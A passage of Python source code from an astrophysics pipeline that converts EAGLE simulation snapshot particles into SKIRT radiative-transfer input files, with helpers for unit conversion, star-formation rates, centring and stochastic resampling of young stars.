densconv = ((params['CM_PER_MPC']/1.e6)**3) / params['SOLAR_MASS']
# calculate the ISM pressure
sdat['P'] = getPtot(sdat['rho_born'], schmidtparams)
gdat['P'] = getPtot(gdat['rho'], schmidtparams)
# calculate stellar center of mass and translational velocity using shrinking aperture technique
com, v_bar = shrinkingCentroid(sdat['r'], sdat['m'], sdat['v'])
# find unit rotation axis vector, using only stellar information and an aperture of 30 kpc
n_rot = rotAxis(sdat['r'], sdat['v'], sdat['m'], com, v_bar, apt=30e3, aptfrac=0.08)
# translate to center of mass and line up with angular momentum vector
transf = Transform()
transf.translate(-com[0], -com[1], -com[2])
a, b, c = n_rot
v = np.sqrt(b*b+c*c)
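    # the two branches below perform the same alignment of the rotation axis with the z-axis,
    # but avoid dividing by a small norm when the axis is nearly parallel to the x-axis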
if v > 0.3:
transf.rotateX(c/v, -b/v)
transf.rotateY(v, -a)
else:
v = np.sqrt(a*a+c*c)
transf.rotateY(c/v, -a/v)
transf.rotateX(v, -b)
sdat['r'],w = transf.transform_vec(sdat['r'][:,0],sdat['r'][:,1],sdat['r'][:,2], np.ones(sdat['r'].shape[0]))
gdat['r'],w = transf.transform_vec(gdat['r'][:,0],gdat['r'][:,1],gdat['r'][:,2], np.ones(gdat['r'].shape[0]))
# apply 30kpc aperture (i.e. remove all particles outside the aperture)
applyAperture(sdat, 30e3)
applyAperture(gdat, 30e3)
# ---- gather statistics about the data as read from the snapshot
# information identifying the SKIRT-run record and the galaxy
info = { }
info["skirt_run_id"] = record["runid"]
info["galaxy_id"] = record["galaxyid"]
# information about the particles
info["original_particles_stars"] = len(sdat['m'])
info["original_initial_mass_stars"] = sdat['im'].sum()
info["original_mass_stars"] = sdat['m'].sum()
info["original_particles_gas"] = len(gdat['m'])
info["original_mass_gas"] = gdat['m'].sum()
info["original_mass_baryons"] = info["original_mass_stars"] + info["original_mass_gas"]
# information about the direction of the stellar angular momentum axis
info["original_rotation_axis_x"] = n_rot[0]
info["original_rotation_axis_y"] = n_rot[1]
info["original_rotation_axis_z"] = n_rot[2]
# ---- initialize statistics about the exported data
info["exported_particles_old_stars"] = 0
info["exported_initial_mass_old_stars"] = 0
info["exported_mass_old_stars"] = 0
info["exported_particles_non_star_forming_gas"] = 0
info["exported_mass_non_star_forming_gas"] = 0
info["exported_particles_young_stars_from_stars"] = 0
info["exported_initial_mass_young_stars_from_stars"] = 0
info["exported_mass_young_stars_from_stars"] = 0
info["exported_particles_hii_regions_from_stars"] = 0
info["exported_initial_mass_hii_regions_from_stars"] = 0
info["exported_mass_hii_regions_from_stars"] = 0
info["exported_particles_unspent_gas_from_stars"] = 0
info["exported_mass_unspent_gas_from_stars"] = 0
info["exported_particles_young_stars_from_gas"] = 0
info["exported_initial_mass_young_stars_from_gas"] = 0
info["exported_mass_young_stars_from_gas"] = 0
info["exported_particles_hii_regions_from_gas"] = 0
info["exported_initial_mass_hii_regions_from_gas"] = 0
info["exported_mass_hii_regions_from_gas"] = 0
info["exported_particles_negative_gas_from_stars"] = 0
info["exported_particles_negative_gas_from_gas"] = 0
info["exported_mass_negative_gas_from_stars"] = 0
info["exported_mass_negative_gas_from_gas"] = 0
info["exported_particles_unspent_gas_from_gas"] = 0
info["exported_mass_unspent_gas_from_gas"] = 0
# ---- resample star forming regions
# set the "standard" constant covering fraction (see Camps+ 2016)
f_PDR = 0.1
# seed the random generator so that a consistent pseudo-random sequence is used for each particular galaxy
np.random.seed(int(record["galaxyid"]))
# define HII region age constants (in years)
young_age = 1e8 # 100 Myr --> particles below this age are resampled
infant_age = 1e7 # 10 Myr --> resampled particles below this age are converted to HII regions
                       #            resampled particles above this age are converted to young stars
# <==> lifetime of an HII region
# set up GALAXEV array
bcstars = np.column_stack([[],[],[],[],[],[],[]])
# set up MAPPINGS-III array
mapstars = np.column_stack([[],[],[],[],[],[],[],[],[]])
# set up dust array
dust = np.column_stack([[],[],[],[],[],[],[]])
# index for particles to resample
issf = gdat['sfr'] > 0.
isyoung = sdat['t'] < young_age
# append older stars to GALAXEV array
if (~isyoung).any():
bcstars = np.concatenate((bcstars, np.column_stack([sdat['r'], sdat['h'], sdat['im'], sdat['Z'], sdat['t']])[~isyoung]), axis=0)
info["exported_particles_old_stars"] = np.count_nonzero(~isyoung)
info["exported_initial_mass_old_stars"] = sdat['im'][~isyoung].sum()
info["exported_mass_old_stars"] = sdat['m'][~isyoung].sum()
# append non-SF gas data to dust array
if (~issf).any():
dust = np.concatenate((dust, np.column_stack([gdat['r'], gdat['h'], gdat['m'], gdat['Z'], gdat['T']])[~issf].copy()), axis=0)
info["exported_particles_non_star_forming_gas"] = np.count_nonzero(~issf)
info["exported_mass_non_star_forming_gas"] = gdat['m'][~issf].sum()
# resample stars
if isyoung.any():
for k in sdat.keys():
sdat[k] = sdat[k][isyoung].copy()
# calculate SFR at birth of young star particles in M_sun / yr
sdat['sfr'] = getSFR(sdat['rho_born'], sdat['im'], schmidtparams)
ms, ts, idxs, mdiffs = stochResamp(sdat['sfr'], sdat['im'])
isinfant = ts < infant_age
if (~isinfant).any():
yngstars['r'] = sdat['r'][idxs][~isinfant]
yngstars['h'] = sdat['h'][idxs][~isinfant]
yngstars['im'] = ms[~isinfant]
yngstars['Z'] = sdat['Z'][idxs][~isinfant]
yngstars['t'] = ts[~isinfant]
bcstars = np.concatenate((bcstars, np.column_stack([yngstars['r'], yngstars['h'], yngstars['im'], yngstars['Z'], yngstars['t']])), axis=0)
info["exported_particles_young_stars_from_stars"] = np.count_nonzero(~isinfant)
info["exported_initial_mass_young_stars_from_stars"] = ms[~isinfant].sum()
info["exported_mass_young_stars_from_stars"] = info["exported_initial_mass_young_stars_from_stars"]
if (isinfant).any():
hiiregions['r'] = sdat['r'][idxs][isinfant]
hiiregions['h'] = sdat['h'][idxs][isinfant]
hiiregions['SFR'] = ms[isinfant] / infant_age # Assume constant SFR over HII region lifetime
hiiregions['Z'] = sdat['Z'][idxs][isinfant]
hiiregions['P'] = sdat['P'][idxs][isinfant] * 0.1 # Convert to Pa for output
hiiregions['logC'] = 0.6*np.log10(ms[isinfant]) + 0.4*np.log10(hiiregions['P']) - 0.4*np.log10(params['BOLTZMANN']) + 0.4
hiiregions['fPDR'] = np.zeros_like(ts[isinfant]) + f_PDR # Covering fraction is set to constant value
# calculate the HII region smoothing length from the mass of the surrounding PDR region,
# estimated to be 10 times as massive (see Jonsson et al. 2010, MNRAS 403, 17-44),
# using SKIRT's standard smoothing kernel mass/size normalization: rho = 8/pi * M/h^3;
# and randomly shift the positions of the HII regions within a similarly enlarged range
hiiregions['h_mapp'] = (10*ms[isinfant] / (np.pi/8 * sdat['rho_born'][idxs][isinfant] * densconv))**(1/3.)
stochShiftPos(hiiregions['r'], hiiregions['h'], hiiregions['h_mapp'])
# append to MAPPINGSIII array
mapstars = np.concatenate((mapstars, np.column_stack([hiiregions['r'], hiiregions['h_mapp'], hiiregions['SFR'],
hiiregions['Z'], hiiregions['logC'], hiiregions['P'],
hiiregions['fPDR']])), axis=0)
info["exported_particles_hii_regions_from_stars"] = np.count_nonzero(isinfant)
info["exported_initial_mass_hii_regions_from_stars"] = ms[isinfant].sum()
info["exported_mass_hii_regions_from_stars"] = info["exported_initial_mass_hii_regions_from_stars"]
# append to dust array with negative mass to compensate for the mass of the surrounding PDR region,
# considered to be 10 times as massive; use zero temperature as T is unavailable for resampled star particles
dust = np.concatenate((dust, np.column_stack([hiiregions['r'], hiiregions['h_mapp']*3.,
-10*ms[isinfant], hiiregions['Z'],
np.zeros(hiiregions['Z'].shape[0])]).copy()), axis=0)
info["exported_particles_negative_gas_from_stars"] = np.count_nonzero(isinfant)
info["exported_mass_negative_gas_from_stars"] = 10*ms[isinfant].sum()
# add unspent young star particle material to dust array
# use zero temperature as T is unavailable for resampled star particles
mass = sdat['im'] - mdiffs
dust = np.concatenate((dust, np.column_stack([sdat['r'], sdat['h'], mass, sdat['Z'], np.zeros(sdat['Z'].shape[0])]).copy()), axis=0)
info["exported_particles_unspent_gas_from_stars"] = len(mass)
info["exported_mass_unspent_gas_from_stars"] = mass.sum()
# resample gas
if issf.any():
for k in gdat.keys():
gdat[k] = gdat[k][issf].copy()
ms, ts, idxs, mdiffs = stochResamp(gdat['sfr'], gdat['m'])
isinfant = ts < infant_age
if (~isinfant).any():
yngstars['r'] = gdat['r'][idxs][~isinfant]
yngstars['h'] = gdat['h'][idxs][~isinfant]
yngstars['im'] = ms[~isinfant]
yngstars['Z'] = gdat['Z'][idxs][~isinfant]
yngstars['t'] = ts[~isinfant]
bcstars = np.concatenate((bcstars, np.column_stack([yngstars['r'], yngstars['h'], yngstars['im'], yngstars['Z'], yngstars['t']])), axis=0)
info["exported_particles_young_stars_from_gas"] = np.count_nonzero(~isinfant)
info["exported_initial_mass_young_stars_from_gas"] = ms[~isinfant].sum()
info["exported_mass_young_stars_from_gas"] = info["exported_initial_mass_young_stars_from_gas"]
if (isinfant).any():
hiiregions['r'] = gdat['r'][idxs][isinfant]
hiiregions['h'] = gdat['h'][idxs][isinfant]
hiiregions['SFR'] = ms[isinfant] / infant_age # Assume constant SFR over HII region lifetime
hiiregions['Z'] = gdat['Z'][idxs][isinfant]
hiiregions['P'] = gdat['P'][idxs][isinfant] * 0.1 # convert to Pa
hiiregions['logC'] = 0.6*np.log10(ms[isinfant]) + 0.4*np.log10(hiiregions['P']) - 0.4*np.log10(params['BOLTZMANN']) + 0.4
hiiregions['fPDR'] = np.zeros_like(ts[isinfant]) + f_PDR # Covering fraction is set to constant value
# calculate the HII region smoothing length from the mass of the surrounding PDR region,
# estimated to be 10 times as massive (see Jonsson et al. 2010, MNRAS 403, 17-44),
# using SKIRT's standard smoothing kernel mass/size normalization: rho = 8/pi * M/h^3;
# and randomly shift the positions of the HII regions within a similarly enlarged range
hiiregions['h_mapp'] = (10*ms[isinfant] / (np.pi/8 * gdat['rho'][idxs][isinfant] * densconv))**(1/3.)
stochShiftPos(hiiregions['r'], hiiregions['h'], hiiregions['h_mapp'])
# append to MAPPINGSIII array
mapstars = np.concatenate((mapstars, np.column_stack([hiiregions['r'], hiiregions['h_mapp'], hiiregions['SFR'],
hiiregions['Z'], hiiregions['logC'], hiiregions['P'],
hiiregions['fPDR']])), axis=0)
info["exported_particles_hii_regions_from_gas"] = np.count_nonzero(isinfant)
info["exported_initial_mass_hii_regions_from_gas"] = ms[isinfant].sum()
info["exported_mass_hii_regions_from_gas"] = info["exported_initial_mass_hii_regions_from_gas"]
# append to dust array with negative mass to compensate for the mass of the surrounding PDR region,
# considered to be 10 times as massive; use negative temperature to indicate that it is not a physical value
dust = np.concatenate((dust, np.column_stack([hiiregions['r'], hiiregions['h_mapp']*3,
-10*ms[isinfant], hiiregions['Z'], -gdat['T'][idxs][isinfant]]).copy()), axis=0)
info["exported_particles_negative_gas_from_gas"] = np.count_nonzero(isinfant)
info["exported_mass_negative_gas_from_gas"] = 10*ms[isinfant].sum()
# add unspent SF gas material to dust array; use negative temperature to indicate that it is not a physical value
mass = gdat['m'] - mdiffs
dust = np.concatenate((dust, np.column_stack([gdat['r'], gdat['h'], mass, gdat['Z'], -gdat['T']]).copy()), axis=0)
info["exported_particles_unspent_gas_from_gas"] = len(mass)
info["exported_mass_unspent_gas_from_gas"] = mass.sum()
# ---- make some sums and write the statistics and output files
info["exported_particles_young_stars"] = info["exported_particles_young_stars_from_stars"] + info["exported_particles_young_stars_from_gas"]
info["exported_initial_mass_young_stars"] = info["exported_initial_mass_young_stars_from_stars"] + info["exported_initial_mass_young_stars_from_gas"]
info["exported_mass_young_stars"] = info["exported_mass_young_stars_from_stars"] + info["exported_mass_young_stars_from_gas"]
info["exported_particles_stars"] = info["exported_particles_old_stars"] + info["exported_particles_young_stars"]
info["exported_initial_mass_stars"] = info["exported_initial_mass_old_stars"] + info["exported_initial_mass_young_stars"]
info["exported_mass_stars"] = info["exported_mass_old_stars"] + info["exported_mass_young_stars"]
info["exported_particles_hii_regions"] = info["exported_particles_hii_regions_from_stars"] + info["exported_particles_hii_regions_from_gas"]
info["exported_initial_mass_hii_regions"] = info["exported_initial_mass_hii_regions_from_stars"] + info["exported_initial_mass_hii_regions_from_gas"]
info["exported_mass_hii_regions"] = info["exported_mass_hii_regions_from_stars"] + info["exported_mass_hii_regions_from_gas"]
info["exported_particles_unspent_gas"] = info["exported_particles_unspent_gas_from_stars"] + info["exported_particles_unspent_gas_from_gas"]
info["exported_mass_unspent_gas"] = info["exported_mass_unspent_gas_from_stars"] + info["exported_mass_unspent_gas_from_gas"]
info["exported_particles_negative_gas"] = info["exported_particles_negative_gas_from_stars"] + info["exported_particles_negative_gas_from_gas"]
info["exported_mass_negative_gas"] = info["exported_mass_negative_gas_from_stars"] + info["exported_mass_negative_gas_from_gas"]
info["exported_particles_gas"] = info["exported_particles_non_star_forming_gas"] + info["exported_particles_unspent_gas"] + info["exported_particles_negative_gas"]
info["exported_mass_gas"] = info["exported_mass_non_star_forming_gas"] + info["exported_mass_unspent_gas"] # - info["exported_mass_negative_gas"]
info["exported_mass_baryons"] = info["exported_mass_stars"] + info["exported_mass_hii_regions"] + info["exported_mass_gas"]
# create the appropriate SKIRT-run directories
skirtrun = SkirtRun(record["runid"], create=True)
filepathprefix = os.path.join(skirtrun.inpath(), "{}_{}_".format(record["eaglesim"], record["galaxyid"]))
# write the statistics file
infofile = open(filepathprefix + "info.txt", 'w')
infofile.write('# Statistics for SPH particles extracted from EAGLE HDF5 snapshot to SKIRT6 format\n')
infofile.write('# Masses are expressed in solar mass units\n')
maxkeylen = max(map(len,info.keys()))
for key in sorted(info.keys()):
valueformat = "d" if "_particles_" in key or "_id" in key else ".9e"
infofile.write( ("{0:"+str(maxkeylen)+"} = {1:15"+valueformat+"}\n").format(key, info[key]) )
infofile.close()
# ---- write output files
# open output files
starsfile = open(filepathprefix + "stars.dat", 'w')
starsfile.write('# SPH Star Particles\n')
starsfile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n')
starsfile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) M(Msun) Z(0-1) t(yr)\n')
gasfile = open(filepathprefix + "gas.dat", 'w')
gasfile.write('# SPH Gas Particles\n')
gasfile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n')
gasfile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) M(Msun) Z(0-1) T(K)\n')
hiifile = open(filepathprefix + "hii.dat", 'w')
hiifile.write('# SPH Hii Particles\n')
hiifile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n')
hiifile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) SFR(Msun/yr) Z(0-1) logC P(Pa) f_PDR\n')
# save particle data
np.savetxt(starsfile, bcstars, fmt=['%f']*7)
np.savetxt(gasfile, dust, fmt=['%f']*7)
np.savetxt(hiifile, mapstars, fmt=['%f']*7+['%e','%f'])
# close output files
starsfile.close()
gasfile.close()
hiifile.close()
# -----------------------------------------------------------------
## This private helper function returns the absolute path to the first EAGLE snapshot file
# corresponding to the given EAGLE simulation name and snapshot tag
def snapfilename(eaglesim, snaptag):
# snapshot filename segment corresponding to the snapshot tag
snapname = { 0 : "000_z020p000",
1 : "001_z015p132",
2 : "002_z009p993",
3 : "003_z008p988",
4 : "004_z008p075",
5 : "005_z007p050",
6 : "006_z005p971",
7 : "007_z005p487",
8 : "008_z005p037",
9 : "009_z004p485",
10 : "010_z003p984",
11 : "011_z003p528",
12 : "012_z003p017",
13 : "013_z002p478",
14 : "014_z002p237",
15 : "015_z002p012",
16 : "016_z001p737",
17 : "017_z001p487",
18 : "018_z001p259",
19 : "019_z001p004",
20 : "020_z000p865",
21 : "021_z000p736",
22 : "022_z000p615",
23 : "023_z000p503",
24 : "024_z000p366",
25 : "025_z000p271",
26 : "026_z000p183",
27 : "027_z000p101",
28 : "028_z000p000" } [snaptag]
return os.path.join(config.eagledata_path[eaglesim],
"particledata_{0}/eagle_subfind_particles_{0}.0.hdf5".format(snapname))
# -----------------------------------------------------------------
## This private helper function reads a hdf5 file field's attributes into a python dictionary.
def fieldAttrs(filename, fieldname):
    fileobj = h5py.File(filename, 'r')
    fieldobj = fileobj[fieldname]
    fieldkeys = list(fieldobj.attrs)
    result = { }
    for key in fieldkeys:
        result[key] = fieldobj.attrs[str(key)]
    fileobj.close()   # release the HDF5 file handle once the attributes have been copied
    return result
# -----------------------------------------------------------------
## This private helper function converts a length/distance/size value from EAGLE snapshot units to parsec
def toparsec(eaglevalue, hubbleparam, expansionfactor):
return eaglevalue * (1e6 * expansionfactor / hubbleparam)
## This private helper function converts a mass value from EAGLE snapshot units to solar masses
def tosolar(eaglevalue, hubbleparam):
return eaglevalue * (1e10 / hubbleparam)
## This private helper function converts a velocity value from EAGLE snapshot units to km/s
def tokms(eaglevalue, expansionfactor):
return eaglevalue * np.sqrt(expansionfactor)
## This private helper function converts a current density value from EAGLE snapshot units to g m^-3
def togcm3(eaglevalue, hubbleparam, expansionfactor):
return eaglevalue * (6.7699e-31 * (expansionfactor**-3) * (hubbleparam**2))
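# Illustrative sketch (not part of the original module): for a Hubble parameter h = 0.6777
# and expansion factor 1 (z = 0), one EAGLE length unit corresponds to 1e6/h ~ 1.476e6 pc
# and one EAGLE mass unit to 1e10/h ~ 1.476e10 Msun.
def _demo_units():
    h = 0.6777
    assert abs(toparsec(1., h, 1.) - 1e6 / h) < 1.
    assert abs(tosolar(1., h) - 1e10 / h) < 1.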
## This private helper function returns the age of a star (in yr) given the universe expansion factor
# when the star was born (in range 0-1)
def age(R):
H0 = 2.3e-18
OmegaM0 = 0.27
yr = 365.25 * 24 * 3600
T0 = 13.7e9
return T0 - (2./3./H0/np.sqrt(1-OmegaM0)) * np.arcsinh(np.sqrt( (1/OmegaM0-1)*R**3 )) / yr
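# Illustrative check (not part of the original module): a star born today (R = 1) should have
# nearly zero age, and R -> 0 recovers roughly T0 = 13.7 Gyr. The hard-coded constants are only
# mutually consistent to ~0.2%, hence the loose tolerance on the first assertion.
def _demo_age():
    assert abs(age(1.0)) < 1e8            # "born today" comes out at a few times 1e7 yr
    assert abs(age(1e-6) - 13.7e9) < 1e6  # "born at the Big Bang" is as old as the universe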
# -----------------------------------------------------------------
## This private helper function returns the periodicity corrected coordinates input as a (N,3)
# numpy array, and takes the box size (in units of crds) and a test length in units of box size
def periodicCorrec(crds, boxsize, testfact = 0.5):
if len(crds)>0:
for i in range(3):
crd = crds[:,i]
booldx = np.abs(crd - crd.min()) > boxsize * testfact
if booldx.any():
crd[booldx] = crd[booldx] - boxsize
return crds
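# Illustrative sketch (hypothetical values): a particle just inside the far edge of a periodic
# box of size 100 is wrapped back so that it ends up close to a particle near the origin.
def _demo_periodicCorrec():
    import numpy as np
    crds = np.array([[1., 1., 1.], [99., 1., 1.]])
    crds = periodicCorrec(crds, 100.)
    assert abs(crds[1, 0] - (-1.)) < 1e-12   # 99 - 100 = -1, i.e. 2 units from the first particle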
# -----------------------------------------------------------------
## This private helper function returns the centre of mass or the centre of mass and mean velocity
# from input particle data, in the units of crds and vels respectively
def centroid(crds, masses, vels):
moments = (crds * np.column_stack([masses]*3)).sum(axis = 0)
M = masses.sum()
if vels.any():
momenta = (vels * np.column_stack([masses]*3)).sum(axis = 0)
return moments/M, momenta/M
else:
return moments/M
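# Illustrative sketch (hypothetical values): note that the mean velocity is only returned when
# vels contains at least one non-zero entry; with all-zero velocities only the CoM comes back.
def _demo_centroid():
    import numpy as np
    crds = np.array([[0., 0., 0.], [2., 0., 0.]])
    masses = np.array([1., 3.])
    com = centroid(crds, masses, np.zeros((2, 3)))
    assert np.allclose(com, [1.5, 0., 0.])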
# -----------------------------------------------------------------
## This private helper function returns the centre of mass and mean velocity of a set of
# particles using a shrinking-aperture iteration: it repeatedly computes the centroid of the
# particles, then shrinks the aperture around that centroid by the given factor, keeping only
# the particles inside it, until fewer than thresh particles remain.
def shrinkingCentroid(crds, masses, vels, thresh=200, shrinkfactor=1.2):
N = np.inf # N set high initially to consider all particles
while N >= thresh:
C, C_vel = centroid(crds, masses, vels)
# define new aperture size as eps
eps = ((((crds-C)**2).sum(axis = -1))**0.5).max()/float(shrinkfactor)
# index for particles within new aperture size
shiftcrds = crds - C
boolidx = ((shiftcrds**2).sum(axis = -1))**0.5 < eps
N = boolidx.sum()
crds = crds[boolidx].copy()
masses = masses[boolidx].copy()
vels = vels[boolidx].copy()
return C, C_vel
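# Illustrative sketch (hypothetical values): because centroid() only returns a velocity when
# vels is non-zero, this routine as written expects non-zero velocities.
def _demo_shrinkingCentroid():
    import numpy as np
    np.random.seed(1)
    crds = np.random.normal(0., 1., (500, 3)) + np.array([10., 0., 0.])
    C, C_vel = shrinkingCentroid(crds, np.ones(500), np.ones((500, 3)), thresh=50)
    assert np.all(np.abs(C - np.array([10., 0., 0.])) < 1.)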
# -----------------------------------------------------------------
## This private helper function returns the unit vector pointing in the direction of the rotation
# axis for input particle data, input CoM and input mean velocity. apt specifies an aperture to
# consider particles within in the units of pos, and aptfrac defines and inner radius within which to
# exclude particles in units of apt.
def rotAxis(crds, vels, mass, com, v_bar, apt = 3e4, aptfrac = 0.08):
# put in centre of mass and rest frame
pos = crds - com
v_rel = vels - v_bar
# calculate apertures
disp = (pos**2).sum(axis=-1)
outapt = disp < apt ** 2
inapt = disp > (aptfrac * apt) ** 2
totapt = inapt * outapt
# calculate J vectors in arbitrary units
Js = np.cross(pos[totapt], v_rel[totapt]) * np.column_stack([mass[totapt]]*3)
# calculate net J vector and normalise to unit vector
J = Js.sum(axis = 0)
    norm2 = np.dot(J, J)   # squared magnitude of the net angular momentum vector
if norm2 > 0: return J * norm2 ** -0.5
else: return np.array((0,0,1))
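# Illustrative sketch (hypothetical values): particles on a ring in the xy-plane circling
# counter-clockwise have their net angular momentum, and hence the returned axis, along +z.
def _demo_rotAxis():
    import numpy as np
    phi = np.linspace(0., 2. * np.pi, 1000, endpoint=False)
    pos = 1e4 * np.column_stack([np.cos(phi), np.sin(phi), np.zeros_like(phi)])
    vel = np.column_stack([-np.sin(phi), np.cos(phi), np.zeros_like(phi)])
    axis = rotAxis(pos, vel, np.ones(1000), com=np.zeros(3), v_bar=np.zeros(3))
    assert np.allclose(axis, [0., 0., 1.])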
# -----------------------------------------------------------------
## This private helper function applies a spherical aperture to a dictionary of particle data, i.e. it
# adjusts the dictionary so that the particles outside the aperture are removed from each array.
def applyAperture(data, radius):
x,y,z = data['r'].T
inside = (x*x+y*y+z*z) <= (radius*radius)
if inside.any():
for key in data:
data[key] = data[key][inside]
else:
for key in data:
shape = list(data[key].shape)
shape[0] = 0
data[key] = np.zeros(shape)
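# Illustrative sketch (hypothetical values): particles outside the aperture are dropped from
# every array in the dictionary, keeping all fields aligned.
def _demo_applyAperture():
    import numpy as np
    data = {'r': np.array([[1., 0., 0.], [5., 0., 0.]]), 'm': np.array([1., 2.])}
    applyAperture(data, 2.)
    assert len(data['m']) == 1 and data['m'][0] == 1.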
# -----------------------------------------------------------------
## This private helper function reads the Schmidt parameters into a python structure.
def schmidtParameters(params):
# extract relevent unit conversions
CM_PER_MPC = params['CM_PER_MPC']
GAMMA = params['GAMMA']
GRAV = params['GRAVITY']
K_B = params['BOLTZMANN']
M_PROTON = params['PROTONMASS']
M_SUN = params['SOLAR_MASS']
SEC_PER_YEAR = params['SEC_PER_YEAR']
# extract relevent runtime parameters used to create EAGLE snapshot
GammaEff = params['EOS_Jeans_GammaEffective']
InitH = params['InitAbundance_Hydrogen']
RhoHi = params['SF_SchmidtLawHighDensThresh_HpCM3']
RhoNorm = params['EOS_NormPhysDens_HpCM3']
SchmidtCoeff = params['SF_SchmidtLawCoeff_MSUNpYRpKPC2']
SchmidtExp = params['SF_SchmidtLawExponent']
SchmidtExpHi = params['SF_SchmidtLawHighDensExponent']
T_JeansNorm = params['EOS_Jeans_TempNorm_K']
# Normalisation in cgs units
Norm_cgs = SchmidtCoeff * pow(pow(CM_PER_MPC / 1.e6, 2) / M_SUN , SchmidtExp - 1) / (1.e6 * SEC_PER_YEAR)
# High density Threshold
RhoHi_cgs = RhoHi * M_PROTON / InitH
# Density normalisation in cgs
RhoNorm_cgs = RhoNorm * M_PROTON / InitH
# Min total Pressure
P_totc = RhoNorm * T_JeansNorm * K_B / (InitH * 1.22)
# Pressure at high density Schmidt law break
PBreak_cgs = P_totc * (RhoHi/RhoNorm) ** GammaEff
# Assume f_g = 1
NormHi_cgs = Norm_cgs * (GAMMA * PBreak_cgs / GRAV) ** ((SchmidtExp - SchmidtExpHi) * 0.5)
# tuple of universal SF parameters
sfparams = RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff
# tuples of high and low pressure SF parameters
sf_lo = Norm_cgs, GAMMA/GRAV, SchmidtExp
sf_hi = NormHi_cgs, GAMMA/GRAV, SchmidtExpHi
return sfparams, sf_lo, sf_hi
# -----------------------------------------------------------------
## This private helper function obtains the SFR of gas from which star particles formed.
#
# Inputs:
# - rho_form: gas density at formation of star particle
# - mass: mass of star particle
# - schmidtpars: parameters for implementing Schmidt law from schmidtParameters()
#
# Outputs:
# - SFR = Star formation rate for gas particle in input mass units per year
#
def getSFR(rho_form, mass, schmidtpars):
# unpack universal SF law parameters
RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff = schmidtpars[0]
# Pressure at star formation
P_form = P_totc * (rho_form / RhoNorm_cgs) ** GammaEff
# unpack high and low pressure SF law parameters
sf_lo, sf_hi = schmidtpars[1:]
# calculate SFR
    if isinstance(rho_form, np.ndarray):
        hidx = rho_form > RhoHi_cgs
        SFR = np.zeros(rho_form.size)
        if np.any(hidx):
            SFR[hidx] = mass[hidx] * sf_hi[0] * (sf_hi[1] * P_form[hidx]) ** ((sf_hi[2] - 1) * 0.5)
        if np.any(~hidx):
            SFR[~hidx] = mass[~hidx] * sf_lo[0] * (sf_lo[1] * P_form[~hidx]) ** ((sf_lo[2] - 1) * 0.5)
else:
if rho_form > RhoHi_cgs:
SFR = mass * sf_hi[0] * (sf_hi[1] * P_form) ** ((sf_hi[2] - 1) * 0.5)
else:
SFR = mass * sf_lo[0] * (sf_lo[1] * P_form) ** ((sf_lo[2] - 1) * 0.5)
# return SFR converted to input mass units per year from per second
return np.array(SFR) * 3.15569e7
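# Illustrative sketch (toy numbers, not physical EAGLE parameters): getSFR accepts a scalar or
# an array density and switches between the low- and high-pressure branches of the Schmidt law.
def _demo_getSFR():
    import numpy as np
    sfparams = (1., 10., 1., 1., 4. / 3.)   # RhoNorm, RhoHi, P_totc, PBreak, GammaEff
    sf_lo = (1e-10, 1., 1.4)                 # Norm, GAMMA/GRAV, exponent (low pressure)
    sf_hi = (1e-10, 1., 2.0)                 # Norm, GAMMA/GRAV, exponent (high pressure)
    rho = np.array([0.5, 20.])               # one particle below, one above the density break
    sfr = getSFR(rho, np.array([1e6, 1e6]), (sfparams, sf_lo, sf_hi))
    assert sfr.shape == (2,) and np.all(sfr >= 0.)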
# -----------------------------------------------------------------
## This private helper function obtains the ambient pressure of gas from which star particles formed.
#
# Inputs:
# - rho: gas density of star forming particle
# - schmidtpars: parameters for implementing Schmidt law from schmidtParameters()
#
# Outputs:
# - P_tot: Ambient pressure from polytropic effective EoS (Schaye & Dalla Vecchia (2004))
#
def getPtot(rho, schmidtpars):
RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff = schmidtpars[0]
P_form = P_totc * (rho / RhoNorm_cgs) ** GammaEff
return P_form
# -----------------------------------------------------------------
## This private helper function samples star forming gas particles into a number of sub-particles.
#
# Inputs:
# - sfr: star formation rate in solar masses per yr
# - m_gas: particle mass in solar masses
#
# Outputs:
# - nested arrays with a list of subparticles for each parent input particle:
# - ms: sub-particle stellar masses in solar masses
# - ts: lookback times of sub-particle formation
# - idxs: index of the sub-particle's parent particle in input array
# - mdiffs: mass of parent particles locked up in new stars; this can be subtracted from the parent gas
# particles for mass conservation
#
def stochResamp(sfr, m_gas):
# mass resampling parameters (see Kennicutt & Evans 2012 section 2.5)
m_min = 700 # minimum mass of sub-particle in M_solar
m_max = 1e6 # maximum mass of sub-particle in M_solar
alpha = 1.8 # exponent of power-law mass function
alpha1 = 1. - alpha
# age resampling parameters
thresh_age = 1e8 # period over which to resample in yr (100 Myr)
# initialise lists for output
ms = [[]]
ts = [[]]
idxs = [[]]
mdiffs = []
# for each parent particle, determine the star-forming sub-particles
for i in range(sfr.size):
sfri = sfr[i]
mi = m_gas[i]
# determine the maximum number of sub-particles based on the minimum sub-particle mass
N = int(max(1,np.ceil(mi/m_min)))
# generate random sub-particle masses from a power-law distribution between min and max values
X = np.random.random(N)
m = (m_min**alpha1 + X*(m_max**alpha1-m_min**alpha1))**(1./alpha1)
# limit and normalize the list of sub-particles to the total mass of the parent
mlim = m[np.cumsum(m)<=mi]
if len(mlim)<1: mlim = m[:1]
m = mi/mlim.sum() * mlim
N = len(m)
# generate random decay lookback time for each sub-particle
        X = np.random.random(N)   # X in [0,1), so (1-X) lies in (0,1] and the logarithm is finite
t = thresh_age + mi/sfri * np.log(1-X)
# determine mask for sub-particles that form stars by present day
issf = t > 0.
# add star-forming sub-particles to the output lists
ms.append(m[issf])
ts.append(t[issf])
idxs.append([i]*np.count_nonzero(issf))
mdiffs.append(m[issf].sum())
# convert sub-particle lists into numpy arrays
ms = np.hstack(ms)
ts = np.hstack(ts)
idxs = np.hstack(idxs).astype(int)
mdiffs = np.array(mdiffs)
return ms, ts, idxs, mdiffs
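# Illustrative sketch (hypothetical values): each parent particle yields a set of sub-particles
# whose total locked-up mass never exceeds that of the parent.
def _demo_stochResamp():
    import numpy as np
    np.random.seed(0)                        # deterministic for the sketch
    m_gas = np.array([1e5, 2e5])             # Msun
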